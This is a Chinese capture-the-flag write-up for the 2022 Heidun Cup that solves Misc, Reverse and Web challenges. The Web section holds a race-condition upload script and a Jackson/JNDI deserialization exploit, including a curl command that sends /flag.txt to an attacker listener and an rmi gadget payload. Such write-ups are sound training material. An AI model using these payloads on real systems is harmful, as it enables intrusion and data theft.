一年一度的黑盾
线下:2022黑盾杯线下渗透一记
data:image/s3,"s3://crabby-images/d0d02/d0d024a97a944d3711f3c5fa8bf39dbc6b8db226" alt="img"
Misc
看不见不等于没有
看不见的字符转换为hex是20和09
data:image/s3,"s3://crabby-images/9010b/9010bb228473cd0fb01c9a485b24785ba368b56b" alt="img"
替换成AB
data:image/s3,"s3://crabby-images/08924/089240ceabc1b70163e0bec1007ff4229d90346f" alt="img"
感觉是摩斯,替换后用工具梭哈
data:image/s3,"s3://crabby-images/0d7f2/0d7f2e29d8e3cf4a2de41c8e81f7f75ab2e5194a" alt="img"
The word is not the word
打开文档,猜测是文档隐藏字符串
data:image/s3,"s3://crabby-images/89c60/89c605b9e4dc1c5c82e6092bc5ccdfdfabd7b341" alt="img"
全选择,右键字体,把隐藏勾掉,然后把所有文字改下颜色即可
data:image/s3,"s3://crabby-images/d50b9/d50b967a053b478a0a9d5551e42f9283034a0b4d" alt="img"
data:image/s3,"s3://crabby-images/f96fb/f96fb258fa27745141733c584c20c3e75cee4bea" alt="img"
flag{heyiamherejustinthedocx}
Reverse
HeidunGame
下载拿到一个apk附件,直接解压,然后拖到dex2jar.bat还原成jar文件
然后 jd-gui 打开在 com.example.heidungame.data.model.LoginDataSource.class
包里发现 flag 字样,左右相等拼接出 flag。
data:image/s3,"s3://crabby-images/5498b/5498bf85bfffd795495a52ddde7e4987aa984042" alt="img"
flag{heidun_game_of_android}
Web
Do you secure
右键打开发现base64编码后的字符串。
依次解开得到
dXBsb2FkX2luZGV4LnBocA==
S0ZDLUNSQVpZLVNVTkRBWS1WTUU1MA==
upload_index.php
KFC-CRAZY-SUNDAY-VME50
data:image/s3,"s3://crabby-images/15c4e/15c4e38b450ac95c2a163f50922c50731f20cfca" alt="img"
访问 upload_index.php 抓包上传,发现php文件死活传不上去,后来仔细分析发现文件传上后会立马删除,这里直接写个脚本条件竞争下就好了。
data:image/s3,"s3://crabby-images/6cba6/6cba67373223eb0594f33c05eb9f0103827f02cb" alt="img"
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20
| # Author: rYu1nser # Date: 2022/9/25 # @Po7's Metadata Powered by rYu1nser import requests import time burp0_url = "http://39.104.68.128:53521/upload.php" burp0_cookies = {"thejs.session": "s%3A64HQdSpgAlG9deMpDu59n7IWhb5hHG_r.BhlyP7L52ViHQi6Pkx8IWOtQ%2BUiZotsB1OeHpt22HI0"} burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": "http://39.104.68.128:53521", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary92NwstIA0In7Y75l", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://39.104.68.128:53521/upload_index.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6", "Connection": "close"} burp0_data = "------WebKitFormBoundary92NwstIA0In7Y75l\r\nContent-Disposition: form-data; name=\"pic\"; filename=\".php\"\r\nContent-Type: text/html\r\n\r\n\r\n------WebKitFormBoundary92NwstIA0In7Y75l--\r\n" while True: url = 'http://39.104.68.128:53521/upload/' + str(int(time.time())-1) + '.php' res = requests.get(url=url) res1 = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data) print("[!]") print(res.url) print(res1.text) print("[!]") if('flag' in res.text): print(res.text) break
|
data:image/s3,"s3://crabby-images/6fbb1/6fbb145c8f8fe1f0cf918bdb30629198ec929cd1" alt="img"
EzJava
经典shiro题,扫目录发现访问login,会跳转到json,然后给你一个JSESSIONID
data:image/s3,"s3://crabby-images/d17a1/d17a15a3587cb7036b34457465d82789bf49033e" alt="img"
data:image/s3,"s3://crabby-images/3f199/3f199dedd90f9bfec65e1b913b6da60747936436" alt="img"
访问login,要求我们登录,那我们就登录,构造参数username和password,发现登录失败,但是返回包返回了rememberMe=deleteMe字符串
data:image/s3,"s3://crabby-images/9c372/9c3725f5683a9cd2d325a044f6336b7d78128bdd" alt="img"
可以发现该题是用shrio框架写的,猜测有shiro反序列化漏洞
data:image/s3,"s3://crabby-images/eae14/eae1499bbd765f4b179dab211dc1f361ccae401c" alt="img"
猜测失败。后来又考虑到shiro权限绕过漏洞,抓包改包成下面这个
data:image/s3,"s3://crabby-images/d06d2/d06d26f87bda5eba9ea27b2e87a6a3131080e9a0" alt="img"
结合报错内容,发现可能存在jackson反序列化漏洞
data:image/s3,"s3://crabby-images/b8555/b8555343bc105e40602c85209a32084bd9c21626" alt="img"
直接工具梭哈
https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0
1
| java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C 'curl http://:11111 -File=@/flag.txt' -A ""
|
data:image/s3,"s3://crabby-images/be3b6/be3b60c18e065ddbdb8d5304d823f99547213697" alt="img"
然后本地开个端口监听。
找条链子直接打就可以了
data:image/s3,"s3://crabby-images/e34ab/e34abb504135a42846f6c1e517367aaa90ab0d9c" alt="img"
1
| ["ch.qos.logback.core.db.JNDIConnectionSource",{"jndiLocation":"rmi://[IP]:11451/6todn5"}]
|
data:image/s3,"s3://crabby-images/e7f75/e7f7569a4f47e1ecd6b7a38a05ec1637d385b69b" alt="img"
flag{1be1840c13}